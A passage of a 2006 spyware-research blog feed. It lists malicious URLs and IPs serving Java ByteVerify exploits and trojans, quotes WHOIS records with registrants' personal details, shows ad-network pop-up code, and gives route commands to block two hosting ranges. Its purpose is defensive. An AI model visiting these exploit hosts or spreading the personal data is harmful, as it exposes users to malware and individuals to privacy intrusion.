/&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;traffmoney.biz/dl/fillmemadv640.htm (JS_ONLOADXPLT.G)&lt;br /&gt;traffmoney.biz/dl/java.jar (JAVA_BYTEVER.S inNewSecurityClassLoader.class &amp;amp; JAVA_BYTEVER.S inNewURLClassLoader.class)&lt;br /&gt;traffmoney.biz/dl/bag.htm&lt;br /&gt;traffmoney.biz/dl/loaderadv640.jar (JAVA_BYTEVER.A in Dummy.class)&lt;br /&gt;traffmoney.biz/dl/adv640.php&lt;br /&gt;&lt;br /&gt;traffnew.biz/dl/java.jar (JAVA_BYTEVER.S inNewSecurityClassLoader.class &amp;amp; JAVA_BYTEVER.S in NewURLClassLoader.class)&lt;br /&gt;traffnew.biz/dl/bag.htm&lt;br /&gt;traffnew.biz/dl/loaderadv640.jar (JAVA_BYTEVER.A in Dummy.class)&lt;br /&gt;traffnew.biz/dl/adv640.php&lt;br /&gt;&lt;br /&gt;traffbest.biz/dl/adv438.php (JS_AGENT.BXY)&lt;br /&gt;traffbest.biz/dl/fillmemadv438.htm (JS_ONLOADXPLT.G)&lt;br /&gt;traffbest.biz/dl/bag.htm (JS_ONLOADXPLT.A)&lt;br /&gt;traffbest.biz/dl/loaderadv438.jar (JAVA_SHINWOW.E in Matrix.class)&lt;br /&gt;traffbest.biz/dl/bag.htm JS_ONLOADXPLT.A&lt;br /&gt;traffbest.biz/dl/fillmemadv428.htm JS_ONLOADXPLT.G&lt;br /&gt;traffbest.biz/dl/loaderadv428.jar&lt;br /&gt;traffbest.biz/dl/adv428.php&lt;br /&gt;traffbest.biz/dl/java.jar (NewURLClassLoader.class) JAVA_BYTEVER.S&lt;br /&gt;&lt;br /&gt;traffweb.biz/dl/fillmemadv774.htm (JS_ONLOADXPLT.G)&lt;br /&gt;traffweb.biz/dl/loaderadv774.jar&lt;br /&gt;traffweb.biz/dl/GetAccess.class&lt;br /&gt;traffweb.biz/dl/adv799.php&lt;br /&gt;traffweb.biz/dl/java.jar&lt;br /&gt;traffweb.biz/dl/bag.htm&lt;br /&gt;traffweb.biz/dl/Counter.class&lt;br /&gt;traffweb.biz/dl/adv774.php&lt;br /&gt;traffweb.biz/dl/java.jar (NewSecurityClassLoader.class) JAVA_BYTEVER.S (NewURLClassLoader.class) JAVA_BYTEVER.S&lt;br /&gt;traffweb.biz/dl/fillmemadv798.htm JS_ONLOADXPLT.G&lt;br /&gt;traffweb.biz/dl/loaderadv798.jar (Dummy.class) JAVA_BYTEVER.A&lt;br /&gt;traffweb.biz/dl/adv798.php&lt;br /&gt;traffweb.biz/dl/bag.htm JS_ONLOADXPLT.A&lt;br /&gt;traffweb.biz/dl/adv764.php&lt;br /&gt;traffweb.biz/dl/loaderadv764.jar (JAVA_BYTEVER.A)&lt;br /&gt;traffweb.biz/dl/fillmemadv764.htm (JS_ONLOADXPLT.G)&lt;br /&gt;traffweb.biz/dl/adv799.php&lt;br /&gt;&lt;br /&gt;traffdollars.biz/dl/fillmemadv598.htm JS_ONLOADXPLT.G&lt;br /&gt;traffdollars.biz/dl/loaderadv598.jar (Dummy.class) JAVA_BYTEVER.A&lt;br /&gt;traffdollars.biz/dl/bag.htm JS_ONLOADXPLT.A&lt;br /&gt;traffdollars.biz/dl/java.jar (NewSecurityClassLoader.class) JAVA_BYTEVER.S (NewURLClassLoader.class) JAVA_BYTEVER.S&lt;br /&gt;traffdollars.biz/dl/adv598.php&lt;br /&gt;&lt;br /&gt;traffcool.biz/dl/fillmemadv542.htm JS_ONLOADXPLT.G&lt;br /&gt;traffcool.biz/dl/adv542.php&lt;br /&gt;traffcool.biz/dl/loaderadv542.jar (Dummy.class) JAVA_BYTEVER.A&lt;br /&gt;traffcool.biz/dl/java.jar (NewSecurityClassLoader.class) JAVA_BYTEVER.S&lt;br /&gt;traffcool.biz/dl/java.jar (NewURLClassLoader.class) JAVA_BYTEVER.S&lt;br /&gt;traffcool.biz/dl/bag.htm JS_ONLOADXPLT.A&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;"traffmoney", "traffnew" and "traffdollars" use the same IP address and the registration information.&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;WHOIS traffmoney.biz, traffnew.biz, traffdollars.biz?&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;traffmoney.biz = [ 85.249.23.119 ]&lt;br /&gt;   Domain Name:                                 TRAFFMONEY.BIZ&lt;br /&gt;   Domain ID:                                   D12368897-BIZ&lt;br /&gt;   Sponsoring Registrar:                        TLDS INC.&lt;br /&gt;   Sponsoring Registrar IANA ID:                320&lt;br /&gt;   Domain Status:                               clientTransferProhibited&lt;br /&gt;   Registrant ID:                               6510552-SRSPLUS&lt;br /&gt;   Registrant Name:                             Jason Coffman&lt;br /&gt;   Registrant Organization:                     Private person&lt;br /&gt;   Registrant Address1:                         908 Alder St&lt;br /&gt;   Registrant City:                             Philadelphia&lt;br /&gt;   Registrant State/Province:                   PA&lt;br /&gt;   Registrant Postal Code:                      19147&lt;br /&gt;   Registrant Country:                          United States&lt;br /&gt;   Registrant Country Code:                     US&lt;br /&gt;   Registrant Phone Number:                     1.74952171179&lt;br /&gt;   Registrant Email:                            admin@toolbarbest.biz&lt;br /&gt;&lt;br /&gt;WHOIS traffbest.biz [ = 85.249.23.119 = sr-customers-23-119.justdns.org]&lt;br /&gt;Jason Coffman of Philadelphia, PA AKA admin@toolbarbest.biz&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;OK, then WHOIS toolbarbest.biz?&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;toolbarbest.biz = [ 85.249.23.117 ]&lt;br /&gt;   Domain Name:                                 TOOLBARBEST.BIZ&lt;br /&gt;   Domain ID:                                   D11890133-BIZ&lt;br /&gt;   Sponsoring Registrar:                        TLDS INC.&lt;br /&gt;   Sponsoring Registrar IANA ID:                320&lt;br /&gt;   Domain Status:                               clientTransferProhibited&lt;br /&gt;   Registrant ID:                               6488994-SRSPLUS&lt;br /&gt;   Registrant Name:                             Alexander Pushkin&lt;br /&gt;   Registrant Organization:                     Home Home&lt;br /&gt;   Registrant Address1:                         Pushkina str. - 1 - 1&lt;br /&gt;   Registrant City:                             Moscow&lt;br /&gt;   Registrant Postal Code:                      123456&lt;br /&gt;   Registrant Country:                          Russian Federation&lt;br /&gt;   Registrant Country Code:                     RU&lt;br /&gt;   Registrant Phone Number:                     78.462788201&lt;br /&gt;   Registrant Email:                            admin@newtoolbar.biz&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;Literary giant Alexander Sergeevich Pushkin (1799-1837)? I wonder if Jason Coffman is a real person, and if he has registered any other domain names?&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;WHOIS newtoolbar.biz? (Ezhi Brozkevitsh Warszawa, Polandadmin@buytraff.biz)&lt;br /&gt;WHOIS buytraff.biz (Ezhi Brozkevitsh Warszawa,Poland darkgt@mail.ru)&lt;br /&gt;There that trail ends.&lt;br /&gt;&lt;p&gt;Reverse name resolution of 85.249.23.119 shows it belongs to Sergey Shishkin of Sergedjus Vlasovas in Klaipeda LT (Lithuania) sergedjus@eexhost.com&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/19736909-114075179710950664?l=spywarehunt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spywarehunt.blogspot.com/feeds/114075179710950664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=19736909&amp;postID=114075179710950664' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/114075179710950664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/114075179710950664'/><link rel='alternate' type='text/html' href='http://spywarehunt.blogspot.com/2006/02/block-traffmoneybiz-traffnewbiz.html' title='Block traffmoney.biz, traffnew.biz, traffbest.biz, traffweb.biz, traffdollars.biz, traffsale1.biz, traffbucks.biz &amp; traffcool.biz'/><author><name>pen</name><uri>http://www.blogger.com/profile/09864726096628334525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-19736909.post-114028233179584490</id><published>2006-02-18T08:50:00.000-08:00</published><updated>2006-04-04T19:01:28.203-07:00</updated><title type='text'>How spyware gets installed</title><content type='html'>&lt;p&gt;Search (using, for example, Google) for "midi file." One of the suggested destinations is musicrobot.com.&lt;/p&gt;&lt;p&gt;&lt;a href="http://photos1.blogger.com/blogger/6156/1959/1600/musicrobot.jpg"&gt;&lt;img style="FLOAT: right; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="musicrobot" src="http://photos1.blogger.com/blogger/6156/1959/320/musicrobot.jpg" border="0" /&gt;&lt;/a&gt;To make some money, musicrobot works with "advertising networks." Note, for example, the Google ads down the right side.&lt;br /&gt;&lt;br /&gt;The banner at the top is a Macromedia Flash presentation from the advertising network FASTCLICK.COM.&lt;br /&gt;&lt;br /&gt;When the musicrobot home page was opened, a pop-under ad window was also opened.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;The pop-under ad is also a Macromedia Flash presentation from the advertising network FASTCLICK.COM.&lt;br /&gt;&lt;a href="http://photos1.blogger.com/blogger/6156/1959/1600/popunder.jpg"&gt;&lt;img style="FLOAT: right; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="popunder" src="http://photos1.blogger.com/blogger/6156/1959/320/popunder.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;(&lt;strong&gt;Note&lt;/strong&gt;: Whenever you encounter an ad like this, always close the window using the "X" in the upper right-hand corner.)&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;FASTCLICK.COM provided to musicrobot the following HTML code to include on their web page:&lt;/p&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;[!-- FASTCLICK.COM POP-UNDER CODE v1.8 for musicrobot.com (12 hour) --]&lt;br /&gt;[script language="javascript"][!--              &lt;br /&gt;var dc=document; var date_ob=new Date();&lt;br /&gt;dc.cookie='h2=o; path=/;';var bust=date_ob.getSeconds();&lt;br /&gt;if(dc.cookie.indexOf('e=llo') [= 0 &amp;&amp;amp; dc.cookie.indexOf('2=o') ] 0){&lt;br /&gt;dc.write('[scr'+'ipt language="javascript" src="http://media.fastclick.net');&lt;br /&gt;dc.write('/w/pop.cgi?sid=2924&amp;m=2&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;tp=2&amp;v=1.8&amp;amp;c='+bust+'"][/scr'+'ipt]');&lt;br /&gt;date_ob.setTime(date_ob.getTime()+43200000);&lt;br /&gt;dc.cookie='he=llo; path=/; expires='+ date_ob.toGMTString();} // --]&lt;br /&gt;[/script]                                       &lt;br /&gt;[!-- FASTCLICK.COM POP-UNDER CODE v1.8 for musicrobot.com --]&lt;br /&gt;&lt;br /&gt;[/head]&lt;br /&gt;[body bgcolor="#FFFFFF" text="#000000" onload="document.forms[0].terms.focus()"]&lt;br /&gt;[center]&lt;br /&gt;[center]&lt;br /&gt;[!-- FASTCLICK.COM 728x90 and 468x60 BANNER CODE for musicrobot.com --]&lt;br /&gt;[script language="javascript" src="http://media.fastclick.net/w/get.media?sid=2924&amp;m=1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;tp=5&amp;d=j&amp;amp;t=n"][/script]&lt;br /&gt;[noscript][a href="http://media.fastclick.net/w/click.here?sid=2924&amp;m=1&amp;amp;c=1" target="_blank"]&lt;br /&gt;[img src="http://media.fastclick.net/w/get.media?sid=2924&amp;m=1&amp;amp;tp=5&amp;d=s&amp;amp;c=1"&lt;br /&gt;width=728 height=90 border=1][/a][/noscript]&lt;br /&gt;[!-- FASTCLICK.COM 728x90 and 468x60 BANNER CODE for musicrobot.com --]&lt;br /&gt;[/center][br]&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;p&gt;All you need to recognize is that musicrobot.com is running javascript that links you to fastclick.com.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;If you use musicrobot to search for "we will rock you", the among the results is a link to http://www.geocities.com/SouthBeach/Strand/2372/soundmidi.html. By itself, this web site is harmless.&lt;br /&gt;The actual link from musicrobot.com is of the form http://media.fastclick.net/w/get.media?sid=2924&amp;m=5&amp;amp;url=http%3A//www.geocities.com/SouthBeach/Strand/2372/soundmidi.html&lt;/p&gt;&lt;br /&gt;&lt;a href="http://photos1.blogger.com/blogger/6156/1959/1600/CursorsOffer.1.jpg"&gt;&lt;img style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/6156/1959/320/CursorsOffer.1.jpg" border="0" /&gt;&lt;/a&gt; &lt;p&gt;That is, you are sent to media.fastclick.net first, where you are confronted with an offer from cdn.fastclick.net, the same source as the earlier pop-under ad. The fastclick.net ad is usually for smileys, ecards, cursors, screensavers or some other thing cute and not obviously malicious.&lt;/p&gt;&lt;p&gt;If you accept the offer, you are asked if you want to install this software. Carefully review what you are accepting. The terms will insist that the software does not gather any personally identifiable information. The terms will also say that the software gathers your IP address. You should know that the IP address is used to identify you and your habits. Carefully consider whether you consider this to be personal identification.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/19736909-114028233179584490?l=spywarehunt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spywarehunt.blogspot.com/feeds/114028233179584490/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=19736909&amp;postID=114028233179584490' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/114028233179584490'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/114028233179584490'/><link rel='alternate' type='text/html' href='http://spywarehunt.blogspot.com/2006/02/how-spyware-gets-installed.html' title='How spyware gets installed'/><author><name>pen</name><uri>http://www.blogger.com/profile/09864726096628334525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-19736909.post-113814709956551342</id><published>2006-01-24T15:41:00.000-08:00</published><updated>2006-01-24T16:02:00.093-08:00</updated><title type='text'>Hide, Go Seek</title><content type='html'>Where could I find hidden files?&lt;br /&gt;&lt;ul&gt;&lt;li&gt;There's the "hidden" attribute. The hidden attribute can be set on directories, not just files.&lt;/li&gt;&lt;li&gt;The "hide in plan sight" strategy is at least as old as Poe's "The Purloined Letter." Its longevity reflects its effectiveness. Finding files that don't belong amongst the hundreds of files that do is a challenge. Using a utility to find unsigned executables and confirming that the signatures that are found are authenticate will produce a long list that includes many benign conditions. See sigcheck from &lt;a href="http://www.sysinternals.com/"&gt;Sysinternals&lt;/a&gt;. (&lt;strong&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;sigcheck -s -v c:\ &gt;result.csv&lt;/span&gt;&lt;/strong&gt;)&lt;/li&gt;&lt;li&gt;Suspect recent files in C:\Winnt\System32 (or C:\Windows\System32). The date stamp is rarely modified. Similarly, suspect recent files in C:\Winnt (or C:\Windows) and in the user's temporary files (C:\Documents and Settings\&lt;user&gt;\Local Settings\Temp).&lt;/li&gt;&lt;li&gt;Hide in a system folder, such as "C:\Windows\Downloaded Program Files" (or "C:\Winnt\Downloaded Program Files"). There's a real folder of that name, but you won't see its contents when you're using Windows Explorer. Use a command window instead. Expect hidden, system files and search subdirectories. (&lt;strong&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;dir "C:\Winnt\Downloaded Program Files" /ah /s&lt;/span&gt;&lt;/strong&gt;) (&lt;strong&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;dir "C:\Winnt\Downloaded Program Files" /s&lt;/span&gt;&lt;/strong&gt;)&lt;/li&gt;&lt;li&gt;Hide using the Directory and System attributes. &lt;a href="http://www.foundstone.com/resources/freetools.htm"&gt;Foundstone&lt;/a&gt;'s hfind utility hunts for files with the hidden attribute, directories with the hidden attribute and directories with the system attribute. There are a lot of hidden files and folders, a lot of benevolent conditions. (&lt;strong&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;hfind \\remote\c$ &gt;&gt; remote.txt&lt;/span&gt;&lt;/strong&gt;)&lt;/li&gt;&lt;li&gt;Hide behind other files, using Alternate Data Streams (ADS). &lt;a href="http://www.foundstone.com/resources/freetools.htm"&gt;Foundstone&lt;/a&gt;'s sfind utility searches for just the streams. (Windows Explorer caches thumbnails using ADS. XP SP2 attaches a "Zone.Identifier" tag to downloaded files using ADS. These are benign uses.) There's also an LADS utility that can search for ADS on the network. The &lt;a href="http://www.sysinternals.com/"&gt;Sysinternals&lt;/a&gt; streams utility can also be used to search for Alternate Data Streams. (&lt;strong&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;streams -s *.*&lt;/span&gt;&lt;/strong&gt; to find ADS, &lt;strong&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;streams -s -d *.jpg&lt;/span&gt;&lt;/strong&gt; to delete the cached thumbnails).&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.sysinternals.com/"&gt;Sysinternals&lt;/a&gt;' Rootkit Revealer is time consuming and reports some benevolent conditions. When used in conjunction with psexec, it can scan remote systems. (&lt;strong&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;psexec \\remote -c rootkitrevealer.exe -a c:\windows\system32\rootkit.log&lt;/span&gt;&lt;/strong&gt;)&lt;/li&gt;&lt;li&gt;Stegdetect (stegdetect *.jpg) can be used to find steganographic content (hidden information) in JPEG images.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/19736909-113814709956551342?l=spywarehunt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spywarehunt.blogspot.com/feeds/113814709956551342/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=19736909&amp;postID=113814709956551342' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/113814709956551342'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/19736909/posts/default/113814709956551342'/><link rel='alternate' type='text/html' href='http://spywarehunt.blogspot.com/2006/01/hide-go-seek.html' title='Hide, Go Seek'/><author><name>pen</name><uri>http://www.blogger.com/profile/09864726096628334525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-19736909.post-113788617918301116</id><published>2006-01-21T15:22:00.000-08:00</published><updated>2006-05-28T14:18:36.930-07:00</updated><title type='text'>Block access to InterCage and Inhoster</title><content type='html'>InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)&lt;br /&gt;Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)&lt;br /&gt;&lt;br /&gt;Use your firewall to block access. If you have no firewall, use route commands to divert traffic. Sample route commands (appropriate for some Windows users):&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;route -p add 69.50.160.0 mask 255.255.224.0 192.168.100.51&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;route -p add 85.255.112.0 mask 255.255.240.0 192.168.100.51&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;When the route command is successful there is no response. "192.168.100.51" is an arbitrarily selected and unused IP address on the local network. "192.168.0.51" or "192.168.1.51" may be more appropriate choices, depending upon the local network configuration. The "-p" (persistent) option is not available in Windows 95 or 98.&lt;br /&gt;&lt;br /&gt;Why? InterCage and Inhoster are Internet Service Providers (ISPs) who permit malicious web activity. A SANS handler &lt;a href="http://isc.sans.org/diary.php?storyid=997"&gt;diary entry&lt;/a&gt; mentions this. ZDNet &lt;a href="http://blogs.zdnet.com/Spyware/?p=752"&gt;malware&lt;/a&gt; blog. Search Google Groups for either name. Search for an individual IP address using Google. One frightening malicious activity is the substitution of their name servers for the name servers supplied by the user's ISP's name servers.&lt;br /&gt;&lt;br /&gt;Further information about browser attacks:&lt;br /&gt;&lt;a href="http://www.mnin.org/"&gt;http://www.mnin.org/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Further information about routing:&lt;br /&gt;&lt;a href="http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/route.mspx"&gt;http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/route.mspx&lt;/a&gt;&lt;br /&gt;&lt;a href="http://spam.abuse.net/adminhelp/ip.shtml"&gt;http://spam.abuse.net/adminhelp/ip.shtml&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.linuxgazette.com/issue36/tag/a.html"&gt;http://www.linuxgazette.com/issue36/tag/a.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.hackfaq.org/null-route.shtml"&gt;http://www.hackfaq.org/null-route.shtml&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Handy "netmask calculators"&lt;br /&gt;&lt;a href="http://jodies.de/ipcalc"&gt;http://jodies.de/ipcalc&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.csc.fi/english/funet/calc/laskin2.html"&gt;http://www.csc.fi/english/funet/calc/laskin2.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Handy network utilities, including a reverse IP lookup&lt;br /&gt;&lt;a href="http://www.domaintools.com/"&gt;domaintools.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Inhoster IP addresses known to have been involved in malicious activities:&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;&lt;br /&gt;&lt;table&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.5&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.6&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.7&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.10&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.11&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.103&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.116&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.119&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.120&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.182&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.112.200&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.10/?to=nan82&amp;from=in&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.10/?to=zonder&amp;from=in&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.22/inc/nan82.html&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=HTML_MHTREDIR.A" target="_blank"&gt;HTML_MHTREDIR.A&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.22/inc/trove.html&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.100&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.101&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.134&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.142&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.149&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.170/345/count3.gif&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=Backdoor.Sdbot.gen" target="_blank"&gt;Backdoor.Sdbot.gen&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.174/w/adult.wmf&lt;/td&gt;&lt;td&gt;malicious WMF file&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.212/5/s1s/image.gif&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.212/5/wind/index.htm&lt;/td&gt;&lt;td&gt;distributes various exploits&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.212/5/i3.php&lt;/td&gt;&lt;td&gt;distributes various exploits&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.212/5/sl/payload.ani&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=Trojan-Downloader.Win32.Ani.b" target="_blank"&gt;Trojan-Downloader.Win32.Ani.b&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.212/5/s2t/tes.exe&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=Trojan-Downloader.Win32.Zlob.cc" target="_blank"&gt;Trojan-Downloader.Win32.Zlob.cc&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.113.242/adv/057/count.jar&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=Exploit.Java.ByteVerify" target="_blank"&gt;Exploit.Java.ByteVerify&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.114.54&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.114.89&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.114.99&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.114.195&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.3&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.45&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td&gt;85.255.115.53&lt;/td&gt;&lt;td&gt;Name server&lt;/td&gt;&lt;/tr&gt;&lt;br 